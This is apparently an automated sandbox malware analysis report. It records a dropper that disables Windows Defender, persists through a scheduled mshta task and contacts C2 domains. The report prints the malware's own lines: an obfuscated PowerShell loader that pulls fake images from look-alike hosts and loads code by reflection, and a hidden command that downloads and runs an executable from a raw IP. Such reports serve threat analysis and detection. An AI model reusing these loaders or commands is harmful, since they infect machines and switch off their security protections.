P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@@g@D0@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@FM@dQBi@HM@d@By@Gk@bgBn@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Cw@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@I@@9@Fs@QwBv@G4@dgBl@HI@d@Bd@Do@OgBU@G8@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBt@GE@bgBk@EI@eQB0@GU@cw@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@QwBv@G4@dgBl@HI@d@Bd@Do@OgBG@HI@bwBt@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@Ck@Ow@g@C@@I@@k@HQ@ZQB4@HQ@I@@9@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@Ow@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@g@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@I@@9@Fs@QwBv@G4@dgBl@HI@d@Bd@Do@OgBU@G8@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@D0@I@BH@GU@d@@t@EM@bwBt@H@@cgBl@HM@cwBl@GQ@QgB5@HQ@ZQBB@HI@cgBh@Hk@I@@t@GI@eQB0@GU@QQBy@HI@YQB5@C@@J@Bl@G4@YwBU@GU@e@B0@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HQ@eQBw@GU@I@@9@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@LgBH@GU@d@BU@Hk@c@Bl@Cg@JwB0@GU@cwB0@H@@bwB3@GU@cgBz@Gg@ZQBs@Gw@LgBI@G8@YQBh@GE@YQBh@GE@cwBk@G0@ZQ@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBn@Gs@ZgBt@GE@agBy@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/fghhhhhhh/vdffgd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gkfmajr/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ofice365.github.io udp
US 185.199.110.153:443 ofice365.github.io tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
GB 92.123.128.152:443 www.bing.com tcp
DE 62.60.226.112:80 62.60.226.112 tcp
US 8.8.8.8:53 pirtyoffensiz.bet udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67bcef97a5ffe.vbs

MD5 e8b52173ea80a3b35b476222cef45835
SHA1 492bbd503f6ac03375104e5e0ec16095117732da
SHA256 15b1f23eff2c505506e6b434806d2ee0b22a6b7bade8e6760225cc36f1e4af06
SHA512 814a971f4dd36d5983dd768560032701fd5c0b19eda5d88beb5079793f4b6eb02cdfb52f2ac90a1d5293b1b2e421e09e98e5ae78150bffc4f577a65e059fbc10

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tj1rh1cl.yv4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/888-13-0x0000025D902B0000-0x0000025D902D2000-memory.dmp

memory/1484-23-0x000001A780090000-0x000001A7800A8000-memory.dmp

memory/4176-24-0x0000000000400000-0x000000000045E000-memory.dmp

memory/4176-27-0x0000000000400000-0x000000000045E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 f41839a3fe2888c8b3050197bc9a0a05
SHA1 0798941aaf7a53a11ea9ed589752890aee069729
SHA256 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA512 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Analysis: behavioral26

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"

Signatures

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2420 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 2420 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 2420 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 2420 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 2420 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 2420 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 1032 wrote to memory of 3008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1032 wrote to memory of 3008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1032 wrote to memory of 3008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4768 wrote to memory of 1992 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4768 wrote to memory of 1992 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4768 wrote to memory of 1992 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE
PID 1992 wrote to memory of 1932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE
PID 1992 wrote to memory of 1932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn sCXK4maXN6R /tr "mshta C:\Users\Admin\AppData\Local\Temp\5WMgEtyym.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\5WMgEtyym.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn sCXK4maXN6R /tr "mshta C:\Users\Admin\AppData\Local\Temp\5WMgEtyym.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE

"C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE"

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 g.bing.com udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\5WMgEtyym.hta

MD5 f8e2603fe8abf0fbff0c7219f29fb096
SHA1 f52c4823fe0f88c26709791ad0e1cfc4c72d5aa5
SHA256 6c544774b42083b87161909dd85992ee985fc44e1527ba3d8d038dc22fad1de5
SHA512 bdeb4c6da166443882ba02338caa6deaa05c477bb7323f3be5b7d850de71af6c828ffa2f8d0f23fc695fda68553a5b17be5b724917c5871d7bd3af80f4ce5ec5

memory/1992-2-0x0000000002DE0000-0x0000000002E16000-memory.dmp

memory/1992-3-0x0000000005560000-0x0000000005B88000-memory.dmp

memory/1992-4-0x00000000054F0000-0x0000000005512000-memory.dmp

memory/1992-6-0x0000000005D30000-0x0000000005D96000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nq4kj3qw.14m.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1992-5-0x0000000005CC0000-0x0000000005D26000-memory.dmp

memory/1992-16-0x0000000005F70000-0x00000000062C4000-memory.dmp

memory/1992-17-0x0000000006390000-0x00000000063AE000-memory.dmp

memory/1992-18-0x0000000006440000-0x000000000648C000-memory.dmp

memory/1992-19-0x0000000007CD0000-0x000000000834A000-memory.dmp

memory/1992-20-0x00000000068D0000-0x00000000068EA000-memory.dmp

memory/1992-22-0x00000000078F0000-0x0000000007986000-memory.dmp

memory/1992-23-0x0000000007880000-0x00000000078A2000-memory.dmp

memory/1992-24-0x0000000008900000-0x0000000008EA4000-memory.dmp

C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE

MD5 03a574d64f0e62c5e117a5f5acf137e4
SHA1 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90
SHA256 dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747
SHA512 d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1

memory/1932-35-0x0000000000610000-0x0000000000A62000-memory.dmp

memory/1932-38-0x0000000000610000-0x0000000000A62000-memory.dmp

memory/1932-39-0x0000000000610000-0x0000000000A62000-memory.dmp

memory/1932-41-0x0000000000610000-0x0000000000A62000-memory.dmp

memory/1932-44-0x0000000000610000-0x0000000000A62000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

146s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\GEFwbK0.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
